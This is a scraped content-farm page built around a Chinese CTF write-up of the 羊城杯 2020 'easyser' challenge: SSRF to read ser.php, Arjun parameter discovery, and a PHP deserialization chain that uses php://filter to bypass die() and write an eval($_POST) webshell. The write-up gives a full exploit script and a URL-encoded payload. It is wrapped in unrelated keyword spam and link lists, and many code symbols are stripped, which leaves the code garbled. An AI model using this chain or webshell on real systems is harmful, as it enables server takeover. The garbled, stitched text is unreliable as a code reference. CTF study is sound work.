当前位置: 首页 > news >正文

衡阳网站建设专家网站开发者 敬请期待

衡阳网站建设专家,网站开发者 敬请期待,网站维护会导致打不开网页吗?,《奖励自己的网站》NSS [羊城杯 2020]easyser 开题。很容易让人觉得环境坏了。 不要慌#xff0c;无从下手时。看源码、扫目录、抓包。一套操作下来#xff0c;发现几个可以下手的路由。 /index.php /robots.txt 访问 /star1.php#xff0c;一说到百度#xff0c;就猜测是否存在SSRF。 源码中…NSS [羊城杯 2020]easyser 开题。很容易让人觉得环境坏了。 不要慌·无从下手时。看源码、扫目录、抓包。一套操作下来发现几个可以下手的路由。 /index.php /robots.txt 访问 /star1.php一说到百度就猜测是否存在SSRF。 源码中有提示更加确定是SSRF了。 SSRF进内网读取ser.php成功读取。 http://127.0.0.1/ser.php好家伙有源码没有反序列化入口 没关系我们可以用一个工具arjun kali上安装 pip3.8 install arjun使用 arjun -u URL详细使用方法 https://github.com/s0md3v/Arjun/wiki/Usage用 Arjun 来扫描 http参数。 star1.php 页面除了 path 参数还有一个 c 参数。Arjun显示发现c的原理是根据响应的body的长度后续通过分析代码发现不设置参数c会显示your hat is too black!存在参数c就不会显示任何内容所以的确是可以根据响应长度来发现参数。c 就是反序列化的入口。但是不知道他是如何反序列化的。 桌面root终端直接用就行了 arjun -u http://node4.anna.nssctf.cn:28617/star1.php?pathhttp://127.0.0.1/ser.php不知道为什么2.2.1版本的没跑出来用一下别的师傅的图。 即使不知道他是怎么反序列化的我们依然能做。分析源码我们的重点肯定是Yongen::hasaki()在这个方法里面绕过死亡die同时写马到文件。死亡die用rot13或者base64都能绕过。通过base64解密或rot13解密使?php die(nononon);?变为乱码而传入的$text为base64编码解码后为正常shell语句。通过这种方式使前者失效。 链子如下 GWHT::__construct()-GWHT::__toString()-Yongen::hasaki()exp用string.strip_tags 将?php?全部删掉再base64解码 ?phpclass GWHT{public $hero; } class Yongen{ //flag.phppublic $file;public $text; }$anew GWHT; $a-heronew Yongen; $a-hero-filephp://filter/writestring.strip_tags|convert.base64-decode/resource1.php; $a-hero-textPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8;echo urlencode(serialize($a));payload: /star1.php?pathhttp://127.0.0.1/ser.phpcO%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A73%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3D1.php%22%3Bs%3A4%3A%22text%22%3Bs%3A32%3A%22PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%22%3B%7D%7D访问1.phpgetshell。
http://www.hkea.cn/news/14584727/

相关文章:

  • 网页制作与设计自考福田网站建设seo信科
  • 服装网站建设与实现新人做网站不懂设计版面怎么办
  • 帮别做网站较好网站建设公司
  • 成品网站源码1688免费推荐思特奇是外包公司吗
  • 广州网站定做宁波制作企业网站
  • 网站开发用什么程序好百事可乐网站建设优缺点
  • 昆明网站服务怎样用腾讯云做网站
  • 苏州网站设计公司官网聚名网认证
  • 公众号建网站形象型网站
  • 网址大全查询网站导航网站前端模板下载
  • 自己的网站怎么和百度做友链怎样建单位的网站
  • 内部网站建设要求php做数据网站
  • 凡科建站官网地址企业门户样式
  • 网站开发ceac证深圳团购网站设计价格
  • 湛江建设局网站wordpress打包ios app
  • 网站建设完成以后应该怎样备份开一家网站建设公司
  • 开网站 怎么做网上支付sem和seo是什么意思
  • 校园网站平台建设企业数字展厅
  • 网站建设存在的问题建站做得好的公司
  • 老山网站建设怎样做商城手机网站
  • 如何更改网站标签logo源码搭建app教程
  • 国外做meta分析的网站wordpress插件使用方法
  • 知名的设计公司网站帮忙做简历的网站
  • eclipse的开发网站开发海宁网站开发
  • 温州网站制作建设做汽车网站开题报告的意义
  • 桂林网站推广西安网站seo服务
  • 个人备案域名做企业网站ui设计的优势与不足
  • 自己做的网站可以发布吗WordPress文章拷贝
  • 沈阳论坛建站模板宣传册排版
  • 重庆网站建设网页设计购物网站建设的必要性